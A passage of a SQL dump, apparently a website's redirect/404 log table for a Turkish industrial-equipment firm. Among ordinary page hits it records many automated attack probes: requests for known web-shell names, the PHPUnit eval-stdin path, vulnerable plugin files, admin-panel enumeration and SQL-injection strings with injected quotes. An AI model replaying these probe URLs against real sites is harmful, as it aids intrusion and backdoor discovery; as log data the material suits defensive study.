00:00:00',301),(24282,'http://www.3s-technologies.com.tr/tr/2018',NULL,'http://www.3s-technologies.com.tr/2018/','',9,0,'2020-03-29 08:25:59','0000-00-00 00:00:00',301),(24283,'http://www.3s-technologies.com.tr/tr/2019',NULL,'http://www.3s-technologies.com.tr/2019/','',9,0,'2020-03-29 08:25:59','0000-00-00 00:00:00',301),(24284,'http://www.3s-technologies.com.tr/tr/bk',NULL,'http://www.3s-technologies.com.tr/bk/','',426,0,'2020-03-29 08:26:00','0000-00-00 00:00:00',301),(24285,'http://www.3s-technologies.com.tr/tr/wp1',NULL,'http://www.3s-technologies.com.tr/wp1/','',8,0,'2020-03-29 08:26:00','0000-00-00 00:00:00',301),(24286,'http://www.3s-technologies.com.tr/tr/wp2',NULL,'http://www.3s-technologies.com.tr/wp2/','',8,0,'2020-03-29 08:26:01','0000-00-00 00:00:00',301),(24287,'http://www.3s-technologies.com.tr/tr/v1',NULL,'http://www.3s-technologies.com.tr/v1/','',8,0,'2020-03-29 08:26:05','0000-00-00 00:00:00',301),(24288,'http://www.3s-technologies.com.tr/tr/v2',NULL,'http://www.3s-technologies.com.tr/v2/','',18,0,'2020-03-29 08:26:05','0000-00-00 00:00:00',301),(24289,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-milling',NULL,'','',9,0,'2020-03-29 12:53:28','0000-00-00 00:00:00',301),(24290,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-non-copper',NULL,'','',5,0,'2020-03-29 13:03:01','0000-00-00 00:00:00',301),(24291,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-kazıma-milling',NULL,'','',10,0,'2020-03-29 13:21:53','0000-00-00 00:00:00',301),(24292,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-yükseklik-self-levelling',NULL,'','',7,0,'2020-03-29 13:40:48','0000-00-00 00:00:00',301),(24293,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-delikler-holes',NULL,'','',8,0,'2020-03-29 14:56:31','0000-00-00 00:00:00',301),(24294,'http://3s-technologies.com.tr/tr/index.php/component/users/?view=registration',NULL,'','',3,0,'2020-03-29 18:07:00','0000-00-00 00:00:00',301),(24295,'http://www.3s-technologies.com.tr/tr/data/admin/allowurl.txt',NULL,'','',38,0,'2020-03-29 20:37:50','0000-00-00 00:00:00',301),(24296,'http://www.3s-technologies.com.tr/tr/&nx=209&ny=18&clkt=36&bg=!8vgl8elyrrugzopkbiecaaabcfiaaachmqf51yexnuqujsudozqupltzjyxrnpd2xiwb6hz0d98mghxxphqf-knni2piqqidkqh4k24d1xn0znnbl1poloa6epli7lbaeu2skgchg2s9hmwpjmnzsgicnrqmyd58gmzu6fcniavsv4dyhxs1lnxqtnfjrysqea70ajqdv4bmflxw_ckpy_z6iowoicxhk-bv9c8cpwiezvfmygabkkphbnoewkybisdwmwmxp_g55zus29hu0twgfqugu00kr6gwh9ng977qwuk36k_ewmlvvavcu4q8bhxupmeeti6_nemjwezcjhdivo4kxtzgnk_cwf5tapu_rj_7vw9tbuowwkfuhlsqqjbtb9si9hh7n0t2pwpxlx7pc8tjpunjrfmhxcerxhj9nhqqodcwxrlnqhzqrmuh285hrdmjnwq8qgtuvrpzfq-ipmdtqfpb_if4qvcsaeqyczdhav-852wskpvwq3mrmyjzli5x3yh5lkzy1u8nymudggk',NULL,'https://www.google.com/','',1,0,'2020-03-30 15:49:27','0000-00-00 00:00:00',301),(24297,'http://3s-technologies.com.tr/tr/scripts/joomla/en-gb.mod_simplefileuploadv1.3.ini',NULL,'','',1,0,'2020-03-30 23:09:40','0000-00-00 00:00:00',301),(24298,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/mod_simplefileuploadv1.3.xml',NULL,'','',2,0,'2020-03-31 22:55:35','0000-00-00 00:00:00',301),(24299,'http://www.3s-technologies.com.tr/tr/index.php/component/users',NULL,'','',3,0,'2020-04-01 02:44:47','0000-00-00 00:00:00',301),(24300,'http://www.3s-technologies.com.tr/tr/components/com_foxcontact/foxcontact.php',NULL,'','',8,0,'2020-04-01 02:44:52','0000-00-00 00:00:00',301),(24301,'http://www.3s-technologies.com.tr/tr/components/com_b2jcontact/vuln.php',NULL,'','',8,0,'2020-04-01 02:44:53','0000-00-00 00:00:00',301),(24302,'http://www.3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/up.php',NULL,'','',6,0,'2020-04-01 02:44:54','0000-00-00 00:00:00',301),(24303,'http://www.3s-technologies.com.tr/tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/tmp-upload-images/vuln.php',NULL,'','',7,0,'2020-04-01 02:44:55','0000-00-00 00:00:00',301),(24304,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/revslider/temp/update_extract/raiz0__ineks.php',NULL,'','',1,0,'2020-04-02 09:23:57','0000-00-00 00:00:00',301),(24305,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/showbiz/temp/update_extract/raiz0__ineks.php',NULL,'','',1,0,'2020-04-02 09:23:59','0000-00-00 00:00:00',301),(24306,'http://www.3s-technologies.com.tr/tr/components/raiz0worm_1585815710.php',NULL,'','',1,0,'2020-04-02 09:24:08','0000-00-00 00:00:00',301),(24307,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/assignments/raiz0_1585815710.php.',NULL,'','',1,0,'2020-04-02 09:24:11','0000-00-00 00:00:00',301),(24308,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/import-export/raiz0__ineks.php',NULL,'','',1,0,'2020-04-02 09:24:12','0000-00-00 00:00:00',301),(24309,'http://3s-technologies.com.tr/tr/wood-processing-ah?ap-i?leme',NULL,'','',17,0,'2020-04-03 09:21:32','0000-00-00 00:00:00',301),(24310,'http://3s-technologies.com.tr/tr/akrilik-i?leme-acrylic-processing',NULL,'','',15,0,'2020-04-03 09:21:37','0000-00-00 00:00:00',301),(24311,'http://3s-technologies.com.tr/tr/aluminyum-i?leme-aluminum-processing',NULL,'','',15,0,'2020-04-03 09:21:40','0000-00-00 00:00:00',301),(24312,'http://3s-technologies.com.tr/tr/ah?ap-i?leme-wood-processing-120cm',NULL,'','',15,0,'2020-04-03 09:21:42','0000-00-00 00:00:00',301),(24313,'http://www.3s-technologies.com.tr/tr/zdeehscvaykmbt.html',NULL,'','',1,0,'2020-04-03 19:37:31','0000-00-00 00:00:00',301),(24314,'http://3s-technologies.com.tr/tr/staging',NULL,'http://3s-technologies.com.tr/','',7,0,'2020-04-04 09:33:59','0000-00-00 00:00:00',301),(24315,'http://3s-technologies.com.tr/tr/qxdpnkfl.html',NULL,'','',1,0,'2020-04-04 17:41:00','0000-00-00 00:00:00',301),(24316,'https://www.3s-technologies.com.tr/en//images/logo/logo-3s.jpg',NULL,'','',6,0,'2020-04-05 01:26:14','0000-00-00 00:00:00',301),(24317,'http://www.3s-technologies.com.tr/tr/css/album.css',NULL,'','',18,0,'2020-04-05 03:31:54','0000-00-00 00:00:00',301),(24318,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/languages/jquery.validationengine-tr.js?vmver=d7768473',NULL,'','',1,0,'2020-04-06 03:53:36','0000-00-00 00:00:00',301),(24319,'http://www.3s-technologies.com.tr/tr/statics/js/admin_common.js',NULL,'','',2,0,'2020-04-07 00:07:19','0000-00-00 00:00:00',301),(24320,'http://www.3s-technologies.com.tr/tr/&nx=72&ny=8&clkt=18&bg=!baelbx9yord9x5jma4ccaaaamfiaaaaomqgnw4wbksa4uhuifkbcsqctkmtumhvnyy_4karbem89m_wag6i65sk0egwavkq0zr9v1oozad2yqff7tmlcrcr29skssxft7wjvqfzqag9thozazwnoypxhla8gl30p1luvvrade9fimex2lkfy509yaouryxbnd5hfjv-gi4iblfbjtp29vixkpnjuzs9tq2vh4xme5yb1zcix8fccpu5djedt4vftqv16v0g4ve7iyni4cinxrx4sljv3haa6enjg8rlyebasl7bcvz0o8tq2acvtf5jwf42cwitlkqvwkikh9wbpesfpplxpxti_zwu9jxlh8nqina8itki4m4aaaj3dzfnsjv1c6sdtx9nyeq0qkiopns-hhp6simvitdty_nfy09zcpou8e4-jif75bseg-druividsjq65ux4_j7ygrt5qnaumgmsaf_fk2lst2d7ldysecjzp-e5i6izw27hkaqxtk0x7rf4fc2rr1keaxgvxui4122v23grsfy3774bk4ltqalkvwp6ja',NULL,'https://www.google.com.tr/','',1,0,'2020-04-07 05:45:10','0000-00-00 00:00:00',301),(24321,'http://www.3s-technologies.com.tr/tr/&nx=75&ny=20&clkt=14&bg=!qeolq1tyord9x5jma4ccaaaamfiaaaammqgnw4wbksa4uhuifkbcsqctkmtumhvnyy_4karbem89m_wag6i65sk0egwavkq0zr9v1oozad2yqff7tmlcrcr29skssxft7wjvqfzqag9thozazwnoypxhla8gl30p1luvvrade9fimex2lkfy509yaouryxbnd5hfjv-gi4iblfbjtp29vixkpnjuzs9tq2vh4xme5yb1zcix8fccpu5djedt4vftqv16v0g4ve7iyni4cinxrx4sljv3haa6enjg8rlyebasl7bcvz0o8tq2acvtf5jwf42cwitlkqvwkikh9wbpesfpplxpxti_zwu9jxlh8nqina8itki4m4aaaj3dzfnsjv1c6sdtx9nyeq0qkiopns-hhp6simvitdty_nfy09zcpou8e4-jif75bseg-druividsjrc5qcup7booh5iorowwpurdxkic6ihzvxwvdeqdm1ndwoyepjdmdylzzysddiz5jyycbywto_4wkukzdf1gotdpvr55dbaw-rsaxtz0b4ddprgkg',NULL,'https://www.google.com.tr/','',1,0,'2020-04-07 05:45:52','0000-00-00 00:00:00',301),(24322,'http://3s-technologies.com.tr/index.php/en/component/content/?view=featured\'[0]',NULL,'','',2,0,'2020-04-07 06:54:40','0000-00-00 00:00:00',301),(24323,'http://3s-technologies.com.tr/tr/humans.txt',NULL,'http://3s-technologies.com.tr/humans.txt','',45,0,'2020-04-08 15:47:20','0000-00-00 00:00:00',301),(24324,'http://www.3s-technologies.com.tr/tr/xxsssseee',NULL,'','',5,0,'2020-04-08 19:55:03','0000-00-00 00:00:00',301),(24325,'http://www.3s-technologies.com.tr/tr/public/ui/v1/js/sea.js',NULL,'','',1,0,'2020-04-08 20:55:46','0000-00-00 00:00:00',301),(24326,'https://3s-technologies.com.tr/tr/hakk?m?zda',NULL,'','',2,0,'2020-04-08 22:40:02','0000-00-00 00:00:00',301),(24327,'https://3s-technologies.com.tr/tr/?r?nler',NULL,'','',2,0,'2020-04-08 22:40:02','0000-00-00 00:00:00',301),(24328,'https://3s-technologies.com.tr/tr/?r?nler/thru-hole',NULL,'','',2,0,'2020-04-08 22:40:03','0000-00-00 00:00:00',301),(24329,'https://3s-technologies.com.tr/tr/?r?nler/cnc',NULL,'','',2,0,'2020-04-08 22:40:03','0000-00-00 00:00:00',301),(24330,'https://3s-technologies.com.tr/tr/?r?nler/lazer-markalama',NULL,'','',2,0,'2020-04-08 22:40:05','0000-00-00 00:00:00',301),(24331,'https://3s-technologies.com.tr/tr/?r?nler/b?lgesel-lehimleme',NULL,'','',2,0,'2020-04-08 22:40:05','0000-00-00 00:00:00',301),(24332,'https://3s-technologies.com.tr/tr/?r?nler/smd-d???k-h?zl?',NULL,'','',3,0,'2020-04-08 22:40:06','0000-00-00 00:00:00',301),(24333,'https://3s-technologies.com.tr/tr/wood-processing-ah?ap-i?leme',NULL,'','',2,0,'2020-04-08 22:40:06','0000-00-00 00:00:00',301),(24334,'https://3s-technologies.com.tr/tr/?r?nler/temizleme-makineleri',NULL,'','',2,0,'2020-04-08 22:40:06','0000-00-00 00:00:00',301),(24335,'https://3s-technologies.com.tr/tr/?r?nler/smd-orta-h?zl?',NULL,'','',2,0,'2020-04-08 22:40:07','0000-00-00 00:00:00',301),(24336,'https://3s-technologies.com.tr/tr/?r?nler/smd-ultra-h?z',NULL,'','',2,0,'2020-04-08 22:40:07','0000-00-00 00:00:00',301),(24337,'https://3s-technologies.com.tr/tr/?r?nler/screen-printer',NULL,'','',3,0,'2020-04-08 22:40:07','0000-00-00 00:00:00',301),(24338,'https://3s-technologies.com.tr/tr/akrilik-i?leme-acrylic-processing',NULL,'','',2,0,'2020-04-08 22:40:08','0000-00-00 00:00:00',301),(24339,'https://3s-technologies.com.tr/tr/?r?nler/dalga-lehim',NULL,'','',2,0,'2020-04-08 22:40:08','0000-00-00 00:00:00',301),(24340,'https://3s-technologies.com.tr/tr/ah?ap-i?leme-wood-processing-120cm',NULL,'','',2,0,'2020-04-08 22:40:09','0000-00-00 00:00:00',301),(24341,'https://3s-technologies.com.tr/tr/?r?nler/konveyorler',NULL,'','',2,0,'2020-04-08 22:40:09','0000-00-00 00:00:00',301),(24342,'https://3s-technologies.com.tr/tr/?r?nler/odd-shape-inserter',NULL,'','',2,0,'2020-04-08 22:40:10','0000-00-00 00:00:00',301),(24343,'https://3s-technologies.com.tr/tr/?r?nler/smd-f?r?n',NULL,'','',3,0,'2020-04-08 22:40:11','0000-00-00 00:00:00',301),(24344,'https://3s-technologies.com.tr/tr/aluminyum-i?leme-aluminum-processing',NULL,'','',2,0,'2020-04-08 22:40:11','0000-00-00 00:00:00',301),(24345,'http://3s-technologies.com.tr/tr/images/dybala.txt',NULL,'','',2,0,'2020-04-09 03:50:24','0000-00-00 00:00:00',301),(24346,'http://www.3s-technologies.com.tr/tr/fhhslsbyggxprw.html',NULL,'','',1,0,'2020-04-09 21:51:48','0000-00-00 00:00:00',301),(24347,'http://3s-technologies.com.tr/tr/old-wp',NULL,'http://3s-technologies.com.tr/','',8,0,'2020-04-10 23:11:45','0000-00-00 00:00:00',301),(24348,'http://3s-technologies.com.tr/tr/bak',NULL,'http://3s-technologies.com.tr/','',37,0,'2020-04-10 23:12:48','0000-00-00 00:00:00',301),(24349,'http://3s-technologies.com.tr/tr/old-site',NULL,'http://3s-technologies.com.tr/','',40,0,'2020-04-10 23:13:14','0000-00-00 00:00:00',301),(24350,'http://www.3s-technologies.com.tr/tr/&nx=236&ny=5&clkt=45&bg=!kzklkopyd0a52-eom1kcaaabuliaaacrmqgbm8roz79v2k7rngsyhyqysl7v2ru2zyerjcaueqtrlsh7kaxih2iq8dmunpxhoorqqozgzdzornsheem9ivmsk5tdc4dvjobvhczu-bfcvbvszznpjahpdpmidcgckvdjocpgballbj4nooqrkejlhzccrxilaakopkmv3iu9duhgum3v3-m-lorttd7e5yiye9fh63zsiso-jkyuqpcdfm6-kwdhg6yyhxk6rod4-a91txcsrap_i0xalcw_aol-grzsvjcyrd55_mfd2e7aagsdavymzoxwwegy3c0mxugdjbd691m4fprwnycdr5xycimx7pgmvu71dbbeuu1ote44wdwwtozdq9mxqbpaid29uibl5cecwlajbxs8b-dv3vttirlmbv2ecnpcmdkfn0cwzluqmr6fd7dbeo8yxafogjgrgvk44r3gryhcj-ik9obruz9wfezef1tdp09uncfeemltd6iro4or6plqiw62m4wfnyipi2nb1z52u10bpdytgr7lncdb1dg-euuzq8zcu4j04nfwlffd',NULL,'https://www.google.com/','',1,0,'2020-04-11 06:29:09','0000-00-00 00:00:00',301),(24351,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/am100_300x300.jpg',NULL,'','',12,0,'2020-04-11 07:08:33','0000-00-00 00:00:00',301),(24352,'http://www.3s-technologies.com.tr/tr/templates/beez5/images/icon_external_link.gif',NULL,'http://www.3s-technologies.com.tr/tr/','',2,0,'2020-04-11 15:55:04','0000-00-00 00:00:00',301),(24353,'http://3s-technologies.com.tr/tr/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'','',3,0,'2020-04-12 16:41:24','0000-00-00 00:00:00',301),(24354,'http://www.3s-technologies.com.tr/tr/wood-processing-ah',NULL,'','',9,0,'2020-04-15 02:09:21','0000-00-00 00:00:00',301),(24355,'http://www.3s-technologies.com.tr/tr/nav',NULL,'','',7,0,'2020-04-15 02:09:25','0000-00-00 00:00:00',301),(24356,'http://www.3s-technologies.com.tr/tr/aluminyum-i',NULL,'','',11,0,'2020-04-15 02:09:25','0000-00-00 00:00:00',301),(24357,'http://www.3s-technologies.com.tr/tr/akrilik-i',NULL,'','',12,0,'2020-04-15 02:09:26','0000-00-00 00:00:00',301),(24358,'http://www.3s-technologies.com.tr/tr/ah',NULL,'','',10,0,'2020-04-15 02:09:26','0000-00-00 00:00:00',301),(24359,'http://www.3s-technologies.com.tr/tr/title',NULL,'','',6,0,'2020-04-15 02:09:29','0000-00-00 00:00:00',301),(24360,'http://3s-technologies.com.tr/tr/plugins/content/apismtp/josmtpapi.php.suspected?test=hello',NULL,'','',2,0,'2020-04-15 08:37:47','0000-00-00 00:00:00',301),(24361,'http://3s-technologies.com.tr/tr/wp-content/plugins/apikey/josmtpapi.php.suspected?test=hello',NULL,'','',2,0,'2020-04-15 08:37:49','0000-00-00 00:00:00',301),(24362,'http://3s-technologies.com.tr/tr/installation/sql/databases.ini',NULL,'','',1,0,'2020-04-15 17:44:13','0000-00-00 00:00:00',301),(24363,'http://www.3s-technologies.com.tr/tr/js/common.js',NULL,'http://www.3s-technologies.com.tr/js/common.js','',13,0,'2020-04-15 18:18:44','0000-00-00 00:00:00',301),(24364,'http://www.3s-technologies.com.tr/tr/sfrclhfikijnfc.html',NULL,'','',1,0,'2020-04-16 03:50:12','0000-00-00 00:00:00',301),(24365,'http://3s-technologies.com.tr/tr/new1/license.txt',NULL,'http://3s-technologies.com.tr/new1/license.txt','',1,0,'2020-04-16 11:03:15','0000-00-00 00:00:00',301),(24366,'http://3s-technologies.com.tr/tr/ldvcniovegdhkfa.html',NULL,'','',1,0,'2020-04-17 03:33:11','0000-00-00 00:00:00',301),(24367,'http://3s-technologies.com.tr/tr/2018',NULL,'http://3s-technologies.com.tr/2018/','',36,0,'2020-04-18 01:11:50','0000-00-00 00:00:00',301),(24368,'http://3s-technologies.com.tr/tr/2019',NULL,'http://3s-technologies.com.tr/2019/','',36,0,'2020-04-18 01:11:52','0000-00-00 00:00:00',301),(24369,'http://3s-technologies.com.tr/tr/bk',NULL,'http://3s-technologies.com.tr/bk/','',685,0,'2020-04-18 01:11:52','0000-00-00 00:00:00',301),(24370,'http://3s-technologies.com.tr/tr/b/license.txt',NULL,'http://3s-technologies.com.tr/b/license.txt','',1,0,'2020-04-18 09:35:00','0000-00-00 00:00:00',301),(24371,'http://3s-technologies.com.tr/tr/bl/license.txt',NULL,'http://3s-technologies.com.tr/bl/license.txt','',1,0,'2020-04-18 14:18:46','0000-00-00 00:00:00',301),(24372,'http://3s-technologies.com.tr/tr/blogs/license.txt',NULL,'http://3s-technologies.com.tr/blogs/license.txt','',1,0,'2020-04-18 18:52:23','0000-00-00 00:00:00',301),(24373,'http://3s-technologies.com.tr/tr/theblog/license.txt',NULL,'http://3s-technologies.com.tr/theblog/license.txt','',1,0,'2020-04-18 23:14:09','0000-00-00 00:00:00',301),(24374,'http://3s-technologies.com.tr/tr/test1/license.txt',NULL,'http://3s-technologies.com.tr/test1/license.txt','',1,0,'2020-04-19 01:39:51','0000-00-00 00:00:00',301),(24375,'http://3s-technologies.com.tr/tr/misc/print.css',NULL,'http://www.google.com/','',5,0,'2020-04-19 05:41:34','0000-00-00 00:00:00',301),(24376,'http://3s-technologies.com.tr/en/sitemap.xml',NULL,'','',10,0,'2020-04-19 07:10:45','0000-00-00 00:00:00',301),(24377,'http://3s-technologies.com.tr/tr/12/license.txt',NULL,'http://3s-technologies.com.tr/12/license.txt','',1,0,'2020-04-19 13:55:27','0000-00-00 00:00:00',301),(24378,'http://3s-technologies.com.tr/tr/?option=com_jsjobs&task=customfields.datafordepandantfield&fvalue=0&child=0\'',NULL,'','',1,0,'2020-04-19 21:43:47','0000-00-00 00:00:00',301),(24379,'http://3s-technologies.com.tr/tr/inf/license.txt',NULL,'http://3s-technologies.com.tr/inf/license.txt','',1,0,'2020-04-20 02:26:47','0000-00-00 00:00:00',301),(24380,'http://3s-technologies.com.tr/tr/2020/license.txt',NULL,'http://3s-technologies.com.tr/2020/license.txt','',1,0,'2020-04-20 06:03:50','0000-00-00 00:00:00',301),(24381,'http://3s-technologies.com.tr/tr/2019/license.txt',NULL,'http://3s-technologies.com.tr/2019/license.txt','',1,0,'2020-04-20 09:50:55','0000-00-00 00:00:00',301),(24382,'http://3s-technologies.com.tr/tr/2018/license.txt',NULL,'http://3s-technologies.com.tr/2018/license.txt','',1,0,'2020-04-20 14:07:58','0000-00-00 00:00:00',301),(24383,'http://3s-technologies.com.tr/tr/2017/license.txt',NULL,'http://3s-technologies.com.tr/2017/license.txt','',1,0,'2020-04-20 18:39:16','0000-00-00 00:00:00',301),(24384,'http://3s-technologies.com.tr/tr/2016/license.txt',NULL,'http://3s-technologies.com.tr/2016/license.txt','',1,0,'2020-04-20 23:11:35','0000-00-00 00:00:00',301),(24385,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php',NULL,'','',43,0,'2020-04-21 05:54:49','0000-00-00 00:00:00',301),(24386,'http://3s-technologies.com.tr/tr/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/util/php',NULL,'','',1,0,'2020-04-21 05:54:50','0000-00-00 00:00:00',301),(24387,'http://3s-technologies.com.tr/tr/modules/autoupgrade/vendor/phpunit/phpunit/src/util/php',NULL,'','',1,0,'2020-04-21 05:54:51','0000-00-00 00:00:00',301),(24388,'http://3s-technologies.com.tr/tr/modules/gamification/vendor/phpunit/phpunit/src/util/php',NULL,'','',1,0,'2020-04-21 05:54:51','0000-00-00 00:00:00',301),(24389,'http://3s-technologies.com.tr/tr/modules/pscartabandonmentpro/vendor/phpunit/phpunit/src/util/php',NULL,'','',1,0,'2020-04-21 05:54:52','0000-00-00 00:00:00',301),(24390,'http://3s-technologies.com.tr/tr/modules/ps_checkout/vendor/phpunit/phpunit/src/util/php',NULL,'','',1,0,'2020-04-21 05:54:52','0000-00-00 00:00:00',301),(24391,'http://3s-technologies.com.tr/tr/shop/vendor/phpunit/phpunit/src/util/php',NULL,'','',1,0,'2020-04-21 05:54:53','0000-00-00 00:00:00',301),(24392,'http://3s-technologies.com.tr/tr/2014/license.txt',NULL,'http://3s-technologies.com.tr/2014/license.txt','',1,0,'2020-04-21 08:54:57','0000-00-00 00:00:00',301),(24393,'http://3s-technologies.com.tr/tr/backup/license.txt',NULL,'http://3s-technologies.com.tr/backup/license.txt','',2,0,'2020-04-22 01:00:06','0000-00-00 00:00:00',301),(24394,'http://3s-technologies.com.tr/tr/themes/readme.txt',NULL,'http://www.google.com/','',7,0,'2020-04-22 05:34:40','0000-00-00 00:00:00',301),(24395,'http://www.3s-technologies.com.tr/tr/lawwgtjie.html',NULL,'','',1,0,'2020-04-23 04:59:21','0000-00-00 00:00:00',301),(24396,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-categories&amp;sa=u&amp;ved=2ahukewiop-2oup7oahxyfqykhv22ahyqfjbgegqibxab&amp;usg=aovvaw3oby3c1a3yooeorv1vwap7//images/stories/explore.gif',NULL,'','',1,0,'2020-04-23 12:41:27','0000-00-00 00:00:00',301),(24397,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component//images/stories/explore.gif',NULL,'','',1,0,'2020-04-23 12:42:10','0000-00-00 00:00:00',301),(24398,'http://3s-technologies.com.tr/tr/admin/administrator/index.php',NULL,'http://3s-technologies.com.tr/admin/administrator/index.php','',1,0,'2020-04-24 07:12:13','0000-00-00 00:00:00',301),(24399,'http://3s-technologies.com.tr/tr/blog/administrator/index.php',NULL,'http://3s-technologies.com.tr/blog/administrator/index.php','',1,0,'2020-04-24 07:35:07','0000-00-00 00:00:00',301),(24400,'http://3s-technologies.com.tr/tr/web/administrator/index.php',NULL,'http://3s-technologies.com.tr/web/administrator/index.php','',1,0,'2020-04-24 07:47:15','0000-00-00 00:00:00',301),(24401,'http://3s-technologies.com.tr/tr/site/administrator/index.php',NULL,'http://3s-technologies.com.tr/site/administrator/index.php','',2,0,'2020-04-24 07:58:50','0000-00-00 00:00:00',301),(24402,'http://3s-technologies.com.tr/tr/administrator/administrator/index.php',NULL,'http://3s-technologies.com.tr/administrator/administrator/index.php','',1,0,'2020-04-24 08:10:14','0000-00-00 00:00:00',301),(24403,'http://3s-technologies.com.tr/tr/adm/administrator/index.php',NULL,'http://3s-technologies.com.tr/adm/administrator/index.php','',1,0,'2020-04-24 08:21:31','0000-00-00 00:00:00',301),(24404,'http://3s-technologies.com.tr/tr/shop/administrator/index.php',NULL,'http://3s-technologies.com.tr/shop/administrator/index.php','',1,0,'2020-04-24 08:32:45','0000-00-00 00:00:00',301),(24405,'http://3s-technologies.com.tr/tr/store/administrator/index.php',NULL,'http://3s-technologies.com.tr/store/administrator/index.php','',1,0,'2020-04-24 08:44:14','0000-00-00 00:00:00',301),(24406,'http://3s-technologies.com.tr/tr/joomla/administrator/index.php',NULL,'http://3s-technologies.com.tr/joomla/administrator/index.php','',1,0,'2020-04-24 08:55:57','0000-00-00 00:00:00',301),(24407,'http://3s-technologies.com.tr/tr/test/administrator/index.php',NULL,'http://3s-technologies.com.tr/test/administrator/index.php','',2,0,'2020-04-24 09:07:52','0000-00-00 00:00:00',301),(24408,'http://3s-technologies.com.tr/tr/joomla2/administrator/index.php',NULL,'http://3s-technologies.com.tr/joomla2/administrator/index.php','',1,0,'2020-04-24 09:19:30','0000-00-00 00:00:00',301),(24409,'http://3s-technologies.com.tr/tr/user/administrator/index.php',NULL,'http://3s-technologies.com.tr/user/administrator/index.php','',1,0,'2020-04-24 09:42:46','0000-00-00 00:00:00',301),(24410,'https://3s-technologies.com.tr/tr/test/license.txt',NULL,'https://3s-technologies.com.tr/test/license.txt','',1,0,'2020-04-25 02:00:59','0000-00-00 00:00:00',301),(24411,'https://3s-technologies.com.tr/tr/tmp/license.txt',NULL,'https://3s-technologies.com.tr/tmp/license.txt','',2,0,'2020-04-25 09:19:37','0000-00-00 00:00:00',301),(24412,'http://3s-technologies.com.tr/en/forum/main-forum',NULL,'','',2,0,'2020-04-25 11:13:12','0000-00-00 00:00:00',301),(24413,'http://3s-technologies.com.tr/tr//administrator/components/com_joomlaupdate/restore.php',NULL,'','',1,0,'2020-04-25 14:19:58','0000-00-00 00:00:00',301),(24414,'http://www.3s-technologies.com.tr/tr?itemid=243',NULL,'','',18,0,'2020-04-25 20:39:29','0000-00-00 00:00:00',301),(24415,'https://3s-technologies.com.tr/tr/www/license.txt',NULL,'https://3s-technologies.com.tr/www/license.txt','',2,0,'2020-04-26 00:17:32','0000-00-00 00:00:00',301),(24416,'http://www.3s-technologies.com.tr/tr?itemid=429',NULL,'','',24,0,'2020-04-26 03:09:49','0000-00-00 00:00:00',301),(24417,'https://3s-technologies.com.tr/tr/site/license.txt',NULL,'https://3s-technologies.com.tr/site/license.txt','',1,0,'2020-04-26 08:08:20','0000-00-00 00:00:00',301),(24418,'https://3s-technologies.com.tr/tr/old/license.txt',NULL,'https://3s-technologies.com.tr/old/license.txt','',3,0,'2020-04-27 00:18:30','0000-00-00 00:00:00',301),(24419,'https://3s-technologies.com.tr/tr/new/license.txt',NULL,'https://3s-technologies.com.tr/new/license.txt','',2,0,'2020-04-27 08:43:34','0000-00-00 00:00:00',301),(24420,'https://3s-technologies.com.tr/tr/1/license.txt',NULL,'https://3s-technologies.com.tr/1/license.txt','',3,0,'2020-04-27 17:24:44','0000-00-00 00:00:00',301),(24421,'http://3s-technologies.com.tr/tr/images/kingskrupellos.txt',NULL,'','',2,0,'2020-04-27 23:25:23','0000-00-00 00:00:00',301),(24422,'https://3s-technologies.com.tr/tr/wp/license.txt',NULL,'https://3s-technologies.com.tr/wp/license.txt','',3,0,'2020-04-28 02:09:24','0000-00-00 00:00:00',301),(24423,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/users/index.php?option=com_user&view=register',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2/index.php/component/users/index.php?option=com_user&view=register','',2,0,'2020-04-29 03:14:26','0000-00-00 00:00:00',301),(24424,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/users/index.php/component/users?view=registration',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2/index.php/component/users/index.php/component/users/?view=registration','',2,0,'2020-04-29 03:14:26','0000-00-00 00:00:00',301),(24425,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/users/component/users?view=registration',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2/index.php/component/users/component/users/?view=registration','',2,0,'2020-04-29 03:14:27','0000-00-00 00:00:00',301),(24426,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/index.php?option=com_user&view=register',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2/index.php/component/index.php?option=com_user&view=register','',2,0,'2020-04-29 03:14:28','0000-00-00 00:00:00',301),(24427,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/index.php/component/users?view=registration',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2/index.php/component/index.php/component/users/?view=registration','',2,0,'2020-04-29 03:14:28','0000-00-00 00:00:00',301),(24428,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/component/users?view=registration',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2/index.php/component/component/users/?view=registration','',2,0,'2020-04-29 03:14:28','0000-00-00 00:00:00',301),(24429,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/index.php?option=com_user&view=register',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2/index.php/index.php?option=com_user&view=register','',2,0,'2020-04-29 03:14:29','0000-00-00 